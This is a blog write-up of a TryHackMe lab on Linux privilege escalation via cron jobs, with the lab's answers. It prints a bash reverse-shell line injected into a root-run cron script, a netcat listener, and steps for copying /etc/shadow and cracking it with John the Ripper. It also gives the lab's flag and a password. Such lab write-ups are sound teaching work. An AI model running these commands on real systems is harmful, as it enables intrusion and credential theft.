TryHackMe - Linux Privilege Escalation: Cron Jobs

TryHackMe - Linux Privilege Escalation: Cron Jobs

This article discusses the solution for TryHackMe's Linux Privilege Escalation Cron Jobs task so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation Cron Jobs Solution


  • Check etc/crontabs for script files that are run as root but the current user can access. Can change the script for reverse shell.

  • Check etc/crontabs for script files that have been deleted already but not removed from crontabs. Can create the same file.

    • Check path. If home/{user} included then can create in currrent users home folder. Also check if user has write permission on other path address
  • tar, 7z, rsync etc. can be exploited using their wildcard feature

How many user-defined cron jobs can you see on the target system?

  1. Run cat /etc/crontab

Screenshot 2024-02-08 at 10 20 56 PM

Answer: 4

What is the content of the flag5.txt file?

  1. We can see in the crontabs there is a file /home/karen/ Run the cat /home/karen/ to check its contents.

  2. We also discover that we have access to the file.

Screenshot 2024-02-08 at 10 31 06 PM

  1. Modify this file to cp flag5.txt to launch a reverse shell

  2. Let's launch a listener at port 9999 in our kali machine. nc -lvnp 1234

  3. Let's locate our serve IP by running ifconfig in our kali machine get the inet of tun0

  4. Run vim /home/karen/ and modify the code to following to create a reverse shell.

     bash -i  >& /dev/tcp/{tun0 inet ip}/1234 0>&1
  5. Run chmod

  6. Wait on the listener terminal until reverse shell is activated.

Screenshot 2024-02-09 at 12 41 26 AM

  1. Run cat /home/ubuntu/flag5.txt

Screenshot 2024-02-09 at 12 42 27 AM

Answer: THM-383000283

What is Matt's password?

  1. Create a local file passwd.txt and shadow.txt and copy the content from the target machine's /etc/passwd and /etc/shadow.

Screenshot 2024-02-09 at 12 24 16 AM

Screenshot 2024-02-09 at 12 25 52 AM

  1. Unshadow the files:

    unshadow passwd.txt shadow.txt > passwords.txt

  2. Run john the ripper on passwords.txt

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

Screenshot 2024-02-09 at 12 28 56 AM

Answer: 123456

Until next time. Keep learning.

Stay stoked and code. :)

I hope you can voluntarilyBuy Me A Coffeeif you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)